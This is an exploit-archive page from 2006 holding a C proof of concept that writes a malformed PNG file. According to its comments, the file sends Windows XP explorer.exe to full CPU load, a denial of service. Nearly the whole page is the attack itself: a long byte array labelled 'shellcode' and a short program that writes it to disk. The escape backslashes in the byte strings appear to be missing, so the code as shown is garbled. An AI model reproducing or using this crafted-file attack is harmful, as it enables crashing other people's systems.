[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
# Published : 2006-08-18
# Author : vegas78
# Previous Title : Macromedia Flash 9 (IE Plugin) Remote Denial of Service Crash Exploit
# Next Title : MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c)
// Microsoft Windows PNG IHDR block DoS PoC (2)
//
// CPU load goes to 100% until you restart explorer.exe
//
// Bug found by: Preddy (?)
//
// Compiled and tested with Windows XP SP2, Visual studio 6, no psdk
//
// Header: 89 50 4e 47 0d 0a
//
// Greets: scoper, [H]Corny, eleet aka takker01 and [...]
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define PNG_NAME "bla.png"
char shellcode[] =
"x89x50x4ex47x0dx0ax1ax0ax00x00x00x0dx49x48x44x52"
"x00x00xffxffx00x00xffxffx08x00x00x00x00xc3x07xf1"
"x5cx00x00x00x07x74x49x4dx45x07xd6x02x0ex0fx25x12"
"x82xbax97x53x00x00x00x09x70x48x59x73x00x00x0axf0"
"x00x00x0axf0x01x42xacx34x98x00x00x00x04x67x41x4d"
"x41x00x00xb1x8fx0bxfcx61x05x00x00x09x4dx49x44x41"
"x54x78xdaxcdx9dx41x6cx1bx45x14x40x27xffx00x00x00"
"xffx00xffx00x00x00x00xffxffx00xffx00xffxffxffxff"
"xffxc8xa8xbdx94x0axc9x2dx1cx20x70x71x7axffxffxff"
"xffxffxffxffxffxffxffxffxffxffx00x4dx0ex75x55x55"
"x4ax72x31x6ax39xd8x85x83x5bx09xd2x14x55xc8x2bxa1"
"x26x15x48xd8x16x12x69x00x01x2ax62x59xefx7axd7x5e"
"x7bx76xfexffx33x63x36xffx14x7bxffxeex3exffx99xff"
"xe7xcfxccxdfxcdx98xcdx02xf9xe7xc7xdfxd8x36x91xc7"
"x8cx9dxbdx0fxc1x9fxf6xf7xe5xefxbexf9x3dx6exb6x80"
"xf1xe9x97x5ex7dx22xf8x64xbbxf2xc7xd7xefx3cxa1x70"
"xc9x11xc8xd8xfex53x77x1ex78x70x1exe3x0fx47x1fx8d"
"x9bx89x23x8fxbfxbbxd5x63xfcxe1x85xb8x71xf8xb2xe3"
"xe4x96xcfxb8x5dx11x7dx48x87xf1xefxd7xe3x46x11x40"
"xcex7bx8cxd5xedxd8x17x7dxd9xffx73x87xf1xdfxb7xa3"
"x8ex1bx99xb8x09x9dxd8x78xb1xc3x78x27x32xe8x64xec"
"x7ax36x6ex46x36x75xdfx61xfcx30xf2x70xc6xe9x0bx8d"
"x9cx11x2fxe3xaexaaxcdxfex8cx76xeax8cx1bx9dxe2xb6"
"x65xc1x66x5bx07x22x8fx26xbdx30x6fx57x92x71x32xbe"
"xf0xa7x88xd1xb4x7dx29x9axf1x31x1exd8x7ax08xa5x37"
"x7bx3dx3fxaax6ex99x2cxe4x40x1dx81x1dx59xd3xeex49"
"x63x24xddx32x5bx6fxdax15xb1xcax81x2dx34xa3xd3x2d"
"xb5x37x78xb6xeex3axa5x12x63x23xc4x68x37x0bx5ax1b"
"x3cx59xeexb6x90x12x63xd9x1ex90xbax46x0fxcfxfbxad"
"xd4x10xffx72xc0x67x36x07xbfx48xddx28x6ax32xa5x59"
"x39x93xe8xfexb9x17x54x16xd9x31x6bx0fx4bx43x8bx29"
"x33x7dxddxa8x29xeexe7x80x1dxefxf1x0cxb0x92x57x47"
"xccx5dx25xf9x9fxc8x8ex46xc3xe6x49x59xb1xbdx8dx62"
"xd8x15x95xecxd8xaex72xbfx3exf1x95x5axd2x76x6ex96"
"xa6x2fx1ex67xd6xf8x5fx9bx8bx2axedx5dx3ex41x3dx43"
"xd4xd6xccx68xdax11x52x91x6dx6fx63x28xa0xa9xb5x35"
"x6bxafx46x1dx39x2cxdbxdexe7xc8x56x04xdax9ax95x22"
"x8fx98x8bx70x2exc0x91x02x1dx11x68xebxc1x21x5bxd9"
"xbfx73x9cxcbx28xb6x35x63x4bx82x63x27x56xa8xf1x3c"
"xf3x81x84x15x41x3bx9ax22x43xdax4dx5axa7xe4xc7x5b"
"x65x3bx5axabxa2xa3x89xabxa4x20x54xe2xd3xfcxaax68"
"x47x96x14x1axd2x99x46xe0x3bx65x9ex7fx05x30xefx01"
"x19x87x13x34x59xcfx89xeax36x6axf9xa3xf0xd2x81xd4"
"x91x90x75x5bx92x11x9ex73x59x17x00x85xd4x0ax2ax89"
"xc9xa5x22x0ex80xddx11xb6x63x54xf6xd3x6fx09x04x64"
"xf4x55xcaxeax76x64xedx37x5bx80x86x79x1dx0ex94x73"
"x91xbfx63x03x3ax15x33xbfxbex39x0fx69x24x3ex87x20"
"xcdxb7x22x0fx6dx02xa7xa2x18xd9xd9x4bx90x86xb9x02"
"x44xf3xf7x12x91x87x40x46x44x7fxecx48x05xeax92xc0"
"x90x63x08xcex04x7ex1dx76x2dx85xcdx59x90x46x62x51"
"x74xafx39xc1xb1x7bx0cx12x9cx1dx83x35x34x39x4bx0a"
"x43x03x70x67xb4x1dxd9xcdxe3xa0x4axe2x6ax24x64x5a"
"x10x9cxa0xa0x81xf4x99x8ex5cx3ex05xebx2cx46xadx5b"
"x1dx12x9cxb4xaex8fx91x9dx3dx0fxaax24x3exe6x87x20"
"x23x2dx38x09x1ex66xf0x8cxecxe4x17x30x24x7fx58x1c"
"x4fx09xcexb9xadx93x91xcdxc8x42xeex13x9dxb2xa1x95"
"xb1x3dx73x03xd4x31x79x90xd3xa2x33x74xf6xc7x0exe4"
"x51x30x4cx32xb3x34x9cxaax1dx14x9dx00x87x47x12xa3"
"x03x09x5bx32x35x0cxf9x94x40xddxd2xeax33xeex15x11"
"xcdx7dxf8xdcxe0x37xa2x15xc6x5fxdbxbax19x99x75x14"
"x76x9cx13xc5xf0x67x23x21x50x5ex63xa0x50x19x1dxc7"
"x01x93x20x36x1bx5exc2x98x10xe9x6ex8cx80x91xb5x5f"
"x83x47x9cx0fx42xa3xe2x1ex91xeaxadx51x30x3ax23xce"
"xcbx90x7bx27x16xfbx23x90xc8x8ex2dxd8xadxa5x18xd9"
"x35xb0x53x26x4axc8x4bxadxc3xd1x4cx8ex91x59x47x4e"
"x01xe9x4axaax88xbbx52x0dxa1x23xc7xe8xb4x37x64xca"
"x3exbfx11x85x9ex65xccxcdx90x39x2ex47x72xe2x39x6d"
"x33xc8x81x8axd1x4ax0dxf8x36xf8x1cx97x23x0bxcfx0b"
"x1bx3cxf1x91x3fxdex08xecx08xadx2fxa8xdax91x75x76"
"x31x44x0bx2dx7ex97x8cx5ex31x6ax22x16x0fx30xebx3d"
"x62x49x8ax96xacxbax5dx32x7ax52x59x41xdcx41x9dxd1"
"xa1x8cx46xe8x76xc9x68x05xccx12xabx0ex46xc6x32x91"
"x10xdexd2x62xe4x61x8cx19x35x31x0ax28xcbx42x46xd4"
"x72xbax2exc6x68xcax9cx80x11x17xe6xf5x31x3ax94x65"
"x9ex8fx77x3cx37xc2xadx1axb8xb5x55x9dx8cx8exf7xf0"
"x22x51x25x92x11x59x44xa2x97xd1x99xccx14x9ax1cx14"
"x7ex5bx23x07x74xedx8cx4ex54xcfx0fx8ex90x8dx3cx37"
"xcex23x5bx5ax71x2cxe4x22x4exacx5fx18x18x20xcdx33"
"xbcxa9x42xebx4dx78x1exe3xcbx4exb4x26x48x37xf9x64"
"x7ax7cx6fx02xa9xfexfex4dxfcxa5xb5x30x1ax93xd3x07"
"x9fxc1xd2xb9x72x6ax81xa0xacxcex68xa6xd3xd3x24x3e"
"x47xcex9fx25xa9x2bxfax4cxa6x02x6dx31x29xb8xb4x2b"
"x8ax7ex6dxe4xeax74x40xeaxbexb7x1ax63x0exdcx5cx52"
"xb7xa2x1ax63x46x8exb0x49x2dx69x91x67x34x8ax52x84"
"x41xdex4bx61x94xf4xebxe4x47x29xb9x13xd9x93x12xe7"
"x48xd9x31x23xe1xccxbexfcx4fx6dx9dx53x40xb4x9bxc4"
"xa2x59x39xc6x9cx02xa1x8dx9bx0cx86x18x25x72x8ax2c"
"xbcx09x22x94x44x89x58x17x44xf7x99xccxc7xe1xcfxd6"
"xadx8dxbdx93x24x0fx4axcdx9dxa6xddx92xdaxd6x03x5b"
"x7fx4dxefx79x86x2cxadx87x52xcax82x24xfax63x38xa9"
"x0exf6x31x4dxd2xa8x58x27xdcx90xcex38x50xa3xd3x1b"
"xd7x10x1bxb3x7dx42x88xe4x64xc6xc1x42x9axbex38x02"
"x6fxc3xf7x09x7axa6x20xe1xd7xf3x03x99x62x5fx9dxc1"
"x75xd2x6fx3dx46x50xa6x31x66x0ex0fx7cx31x41x3axbd"
"x4fx66x08xf1x87xc6xf8xdexd0xadx7ax7fx4ex92xaex94"
"xa2xa8x53xfax63x66xb8x63x05xa3x2fxcdx67xc0xcaxa3"
"x9ex10x7dx86xb7xe0xd0x7dxb0x26x49xcdx26x9bxf8xf9"
"x35x65x9cx31x78x7bxbcx67x5ex59xaexb1x7dxd3xc7xa8"
"xd3xaexc4xe4x35xacx2ax85x31xcdxe5x48x49x66x92xd3"
"x68x46x8axcfx4cx13x74x61xc1x47x1fx0axe3x3ex82x2e"
"x2cx7bxd1x29x1ax85xf1x19xadx8cx89x83x58x4dx0ax23"
"xd5x2dx00x19x1fx05xa3x66x49x8fx82x11xaexbax22xc9"
"x1exacx22x85x71x95xa0x8bx90x71x6cx14xa7x30x22xb6"
"xc3x49x8cx58x45x0ax63x95xa0xabx53x28x8cx35xcdx1d"
"x72x14x8cx6dxdcx4ex2ex56xe0xe7x0ax25x18x59x29x1e"
"x43x92x18x2dxb0x08x9bx22x70x3dxb3x0cx23x3bx0bx57"
"x72x8dx40x88xe3xccx4cx1cxadx4dxadx89x7bx43x1fx24"
"xa2x1ax4ex8ax91x5dxd3x07xb9x81x55x24xe7x14xd7xde"
"x40x54x36xa1x64x44x3exe3x42x22xaax0bx51xb2x31x3a"
"x46x66xcdx9cxd1xd2xdex70x21xaex3cx23x6bx9fxd6x61"
"x4ax4cxc5x9ex3cx23x63x37x8fxccx2axf7xcaxcdx91xda"
"xb1x23x0bxcfxcfx2ax36x38x3axf4xc8xcfx15xdax0bx07"
"x66x95x46x9dx1ax5ax53x61x3exd3x5ex78xf6xe5x4bxf2"
"xc6x44x14xb9xfaxa2xb8x37x6cxe4xcax92x9bx35xf8xf5"
"x1ex0dx35x1fx46x56x06x13x51xf9xa8x91xb1x83x49xdf"
"xc7x46xefx10x6bxabx4bxa1xafxe7x12x26x47x7ax18xd3"
"xe4x25x8cx56xedxffx66xa4xacxc0x7bxb2x8ax2fxefxd1"
"xc4x78x88x7cx46x89xa0xabx85xd1x44x4fxf1x7cx39x7f"
"x99xa0xacxadx4ex8ax22xd6x12x69x53x73x64x8cx37x58"
"xc4x1axb4x55x5dx5ax23x74xc6x91x31x5ax4bx25x2bxc9"
"x1bxcdxadx6ax89x50x68x36x3axc6x56x75xa9xc6x35x14"
"xddx82x1ax19xadxf5x5ex7cx6cx5dx28x79xa9xe5xc0xf2"
"xa2x63xc1x75x19x40x35xc6x0cx0bxacxb2xdcxedx7bxad"
"xd5x52x60xc2xbexa1xa7xb5xb9xb4x4cx6fxe2x9exc8x8f"
"xd7x0dxbbxe1xbfx3dxcex7bxebx5dxa3xe0x16x53x9bx59"
"xf7xdbx82xbfxa1x55xc9x2bxbdx82x4ax29xa7xe8x24x3b"
"x3ex65xd1xb6xebx5exd5x42xa7xbcx39x1bx30x36x8axca"
"xefx66x54x61xecx3ex9axeex15x54x18x79x77xb7xc5xf4"
"xaax71xddx8dx4ex33x97x4dx0exf1x19x66x26x5fxacxd7"
"x29x65x71xcax76x74x6dxe5x17x03x04xb5xd7x5cx04xc3"
"xccx16x2ax8dxaex06xa1xe8x43x83x1dx3bx52xcfx84x6b"
"x21x87xf6x7dx8dx64x3exc0x73x85x54x4fxa1x25xf6xa4"
"xaexb6xd6x27xfaxd2xb3x50xd8xe1x16xebxd6x28x97x97"
"x67x0cx05xbbx44x08x22x78xbexd5x98x3cx34xc5x29x26"
"x6excdx93x66xe7x0ax76xb4x22x37x25xbdx03xc6x5cx7a"
"x82x93xfbx5axb7x6ax35xdax02xc2x68xc6x6bxc3x31xb2"
"xb1x32x98x54xb4x36xefxdexaexdexa3x2fx70x28x30x0a"
"x1ex4ax9ex70x18xc7x43x73x1cxebxeexedx5bxb7xf1x4b"
"x13xbax18xd7xfaxedxd4x0axedxcaxeexe9xffx09x2ax78"
"xcax8cx01xdfx92x93x70x19xe9xb9x1ex73x27x2fx6fx57"
"xa7x37xefxdex5bx5bx97x4ax75xc2x22x1fxc3xbbxafxa6"
"xadxfbxa3x9dxd1x7bxc0xc3xabxa8xd1xf3x3ax4bxa5x71"
"xc6x9dxf8xd7xfbx47x8cxa4x1fxc6x0bx5axe8x34x30xb2"
"x6cxb3x3cx90xd1xf8x15xd9x3ax19x8fx3dx60x0fxe8x73"
"xe3x1exd2xf0x57x5ex39xb1x4exc6x4fx6dx66x7fx36xa6"
"xf1x82xddx47x22x35x32x8ex7fxebx30xfexb4x5fx2bxa3"
"x9bx4bx4axbdxd2x90x2fxc7xffxeexbcx2bx1exf1x42x19"
"x9ax64xb1x6fx3cx43xc8xaex2fxddxf7xd9xdfxd9x66xff"
"xfdx21x24x53xf7x5dxc6x7fx4fxefx88x9bx24x52x76x5f"
"xb1xbdxffxafxb0x75x72xbbx42xeexfexe4x9fx2exe3xb6"
"x85xf4x10xbbxffxefx63x6bx7ex7fx2cx8bx53x42x79x78"
"xeax8ax8bxd8x65xb4xedx9fx2fx4exedx8ax1bx2ax24xe3"
"xc7x97xefx77xd9xc6x82x57x77x6dxadxdexf8xf2x97xb8"
"xc9x7cxd9xf7xdcx8bx4fx3fxecx7fx18xebx7fxbdxd8x5f"
"x0fxe2x66xf3xe5x91xfexaexf7x1fx3ax53xb1x09xddxaf"
"x0exbax00x00x00x00x49x45x4ex44xaex42x60x82x00";
int main() {
FILE *File;
int i = 0;
if((File=fopen(PNG_NAME,"wb")) == NULL) {
printf("Unable to create file %s", PNG_NAME);
getch();
exit(0);
}
printf("Creating PNG filen");
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],File);
fclose(File);
printf("PNG file %s successfully created..n", PNG_NAME);
getch();
return 0;
}
// www.Syue.com [2006-08-18]